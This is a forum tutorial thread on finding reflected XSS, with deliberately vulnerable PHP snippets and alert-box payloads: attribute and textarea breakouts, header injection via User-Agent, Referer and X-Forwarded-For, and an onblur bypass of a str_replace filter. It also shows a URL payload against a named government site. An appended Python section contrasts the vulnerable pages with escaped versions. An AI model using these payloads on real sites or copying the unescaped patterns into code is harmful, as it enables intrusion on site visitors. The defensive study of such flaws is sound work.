io.kent Posted June 27, 2013 (edited)

Let's not limit ourselves to finding XSS the usual way, with the typical <script>alert("XSS")</script>. It is one of the most common vulnerabilities today, and as dangerous as any of them, because if you know how to use it you can do whatever you want.

Case 1

Any vulnerability is limited only as far as you want it to be, from cookies all the way to a deface; you just need 2 essential things:
1) mentality
2) imagination
After that, the sky is the limit.

One of the most common cases. The vulnerable code:

[CODE]
<html>
<head>
<title>Search form</title>
</head>
<body>
<center>
<?php
if (isset($_POST['text'])) {
    $xss = $_POST['text'];
    // the submitted value is echoed straight back into the input, unescaped
    echo "<form name=\"xss\" method=\"POST\"><h1>0 results</h1><br><hr><br><input type=\"text\" value=\"$xss\" name=\"text\"><br><input type=\"submit\" value=\"Search\"></form>";
} else {
    echo "<form name=\"xss\" method=\"POST\"><h1>Search form</h1><br><hr><br><input type=\"text\" value=\"\" name=\"text\"><br><input type=\"submit\" value=\"Search\"></form>";
}
?>
</center>
</body>
</html>
[/CODE]

As we can see in the source, if we search for something, whatever we searched for stays in the form. So it's easy, we write:

[CODE]
">Becali-- "><script>alert("XSS")</script>
[/CODE]

which, logically, stays like this: <input type="text" value="">

Case 2: Restrictions on certain characters / limited text fields

Another very common case; I'll leave this wonder here: http://www.gov.ro/
Nothing could be added in the form, anything like:

[CODE]
">$#-|/()=\*¿?[
[/CODE]

not a single special character. Searching for a simple word (buna), the result was this:

[CODE]
resultatgeneral.jsp?cuvantul=buna&servici=0
[/CODE]

So I did it the following way:

[CODE]
http://url/resultatgeneral.jsp?cuvant="><script>alert(/OK/)</script>&servici=0
[/CODE]

[b]Bingo[/b]

This can be done with TAMPER DATA (Firefox add-on): modifying the content that is sent via POST.

Case 3: Textarea

[CODE]
<textarea style="width:320px; height:120px" name=message></textarea>
[/CODE]

As you can see, with a simple "> the bypass doesn't work. If we enter some text it will look like this:

[CODE]
<textarea style="width:320px; height:120px" name=message>Mensaje</textarea>
[/CODE]

With </textarea><script>alert(/PWNED/)</script> it would end up like this:

[CODE]
<textarea style="width:320px; height:120px" name=message></textarea><script>alert(/PWNED/)</script></textarea>
[/CODE]

Headers

This one is very interesting: we play with the headers to get an XSS.

1 - User-Agent

Source:

[CODE]
<?php
$nav = $_SERVER['HTTP_USER_AGENT'];
echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>";
?>
[/CODE]

Header:

[CODE]
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
[/CODE]

And if we modify it (the rest of the headers stay the same):

[CODE]
Host: localhost
User-Agent: (I don't remember the name :$)
[/CODE]

And ...

[CODE]
User-Agent: <script>alert(/Yeah/)</script>
[/CODE]

2 - Referer

Header:

[CODE]
Host: What IP do I have? What is my IP?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com.do/
Cookie: ******
[/CODE]

And if we modify it (the rest of the headers stay the same):

[CODE]
Referer: <script>alert(/Yeah/)</script>
[/CODE]

3 - X-Forwarded-For

[CODE]
Host: What IP do I have? What is my IP?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/
X-Forwarded-For: 127.0.0.1
Cookie: ******
[/CODE]

127.0.0.1 being the IP to spoof. This gives us the IP as output, which in this case would be 127.0.0.1.

[CODE]
Host: *********
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://google.com
X-Forwarded-For: <script>alert(/Yeah/)</script>
Cookie: ******
[/CODE]

It's the same as an XSS.

STR_Replace

What to do if you find a script like this for XSS:

[CODE]
<?php
if (isset($_GET['xss'])) {
    $xss = $_GET['xss'];
    // a blacklist "filter": removes the literal strings <script> and alert, nothing else
    $xss2 = str_replace("<script>", "", $xss);
    $xss3 = str_replace("alert", "", $xss2);
    echo "<form name=\"Hi\"><input type=\"text\" value=\"$xss3\" size=\"30\"></form>";
}
?>
[/CODE]

If we try to put <script>alert(Yeah)</script> it would remain like this: alert(Yeah)</script>, and so no alert is produced. But let's try to get further. As we see in the source, if we search for (aaaa) this is the result:

[CODE]
<input type="text" value="aaa" size="30">
[/CODE]

It looked like something as simple as "><script>alert(WTF)</script>, but we can't use script, so all we can do is think: the script is completely vulnerable, the code is printed exactly as it arrives, only excluding <script>. Here we'll use JavaScript events (http://www.w3schools.com/js/js_events.asp).

We use: onblur

We enter: Onblur=alert(000). No alert is produced, it stays inside the form. For that, if we enter bufnita it would be like this:

[CODE]
<input type="text" value="" bufnita size="30">
[/CODE]

so the form value would be null:

[CODE]
" Onblur=alert(666) "
[/CODE]

[CODE]
<input type="text" value="" " Onblur=alert(666) " size="30">
[/CODE]

In this case we have added an event property to the input, causing an XSS!!

Good luck...

Edited June 27, 2013 by io.kent
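Added example, not code from the original post or from any of the sites it mentions: the post's three reflection points (a page that echoes a request header, the textarea, and the str_replace "filter" in front of an input value) modelled in Python so they can be exercised offline, each beside a hardened variant that uses html.escape(quote=True), the equivalent of PHP's htmlspecialchars($s, ENT_QUOTES). The raw request bytes, the hostname and the payload values are constructed for the example. A real HTML parser, not string matching, decides whether a payload lands as a script element or as an on* event handler, which is what the browser would execute. Two details of the filter matter for the attribute-breakout payload: PHP's str_replace is case-sensitive and single-pass, and it also strips the word alert out of an event-handler payload, so the example uses confirm, or the entity-encoded al&#101;rt, which a browser decodes inside an attribute value before the JS engine sees it.

```python
"""Added example, not code from the original post.

Models the post's PHP snippets in Python and checks, with a real HTML
parser, what markup a browser would see in the rendered output.
"""
import html
from html.parser import HTMLParser

# Constructed raw request, the shape Tamper Data (or curl -H) would send.
# The hostname is a placeholder; the three reflected headers carry the payload.
RAW_REQUEST = (
    "GET /browser.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "User-Agent: <script>alert(/Yeah/)</script>\r\n"
    "Referer: <script>alert(/Yeah/)</script>\r\n"
    "X-Forwarded-For: <script>alert(/Yeah/)</script>\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)


def parse_request_headers(raw):
    """Map header names to PHP-style $_SERVER keys (User-Agent -> HTTP_USER_AGENT)."""
    head = raw.split("\r\n\r\n", 1)[0]
    server = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        server["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return server


def vulnerable_echo_page(server, key="HTTP_USER_AGENT"):
    """Same layout as the post's PHP: the header value is echoed verbatim."""
    return f"<b><center><h1>browser:</h1><br><hr><br>{server.get(key, '')}</center></b>"


def hardened_echo_page(server, key="HTTP_USER_AGENT"):
    """Same page with the header value HTML-escaped (htmlspecialchars, ENT_QUOTES)."""
    safe = html.escape(server.get(key, ""), quote=True)
    return f"<b><center><h1>browser:</h1><br><hr><br>{safe}</center></b>"


def weak_filter(value):
    """PHP: str_replace('<script>', '', $xss) then str_replace('alert', '', ...).
    Case-sensitive, single-pass, and it never touches quotes or on* attributes."""
    return value.replace("<script>", "").replace("alert", "")


def vulnerable_form(value):
    """The post's str_replace page: filtered value dropped into a quoted attribute."""
    return f'<form name="Hi"><input type="text" value="{weak_filter(value)}" size="30"></form>'


def hardened_form(value):
    """Quotes are escaped, so the value can never leave the attribute."""
    return f'<form name="Hi"><input type="text" value="{html.escape(value, quote=True)}" size="30"></form>'


def vulnerable_textarea(message):
    return f'<textarea style="width:320px; height:120px" name=message>{message}</textarea>'


def hardened_textarea(message):
    return f'<textarea style="width:320px; height:120px" name=message>{html.escape(message, quote=True)}</textarea>'


class _Collector(HTMLParser):
    """Counts script start tags and records every on* attribute with its value."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.handlers = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, value in attrs:  # attribute values arrive entity-decoded,
            if name.startswith("on"):  # as the browser hands them to the JS engine
                self.handlers[name] = value


def injected_markup(body):
    """Return {'script_tags': n, 'handlers': {name: js}} for what a parser sees in body."""
    p = _Collector()
    p.feed(body)
    p.close()
    return {"script_tags": p.script_tags, "handlers": p.handlers}


if __name__ == "__main__":
    server = parse_request_headers(RAW_REQUEST)
    for key in ("HTTP_USER_AGENT", "HTTP_REFERER", "HTTP_X_FORWARDED_FOR"):
        print(key, injected_markup(vulnerable_echo_page(server, key)),
              injected_markup(hardened_echo_page(server, key)))
    breakout = "</textarea><script>alert(/PWNED/)</script>"
    print("textarea", injected_markup(vulnerable_textarea(breakout)),
          injected_markup(hardened_textarea(breakout)))
    for payload in ("<script>alert(Yeah)</script>",
                    '" onblur=confirm(666) "',
                    '" onblur=al&#101;rt(666) "'):
        print(repr(payload), injected_markup(vulnerable_form(payload)),
              injected_markup(hardened_form(payload)))
```

Run it as a script and each vulnerable renderer reports a script element or an onblur handler while its hardened twin reports none; the same `injected_markup` check works on a real response body fetched with the crafted headers, which is the practical way to confirm a header reflection instead of looking for an alert box.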
th3me Posted June 27, 2013

Nice, nice.
aaaax22268578956 Posted June 28, 2013

Very useful, thanks :D
TokyoMode Posted June 28, 2013

Hmm, the last part isn't explained well, but very good, respect for the effort, nice.
io.kent (Author) Posted June 28, 2013

TokyoMode, if you pay attention I think you'll understand it well, or at least it's acceptably understandable..
Jimmy Posted June 29, 2013

You should also cite the source.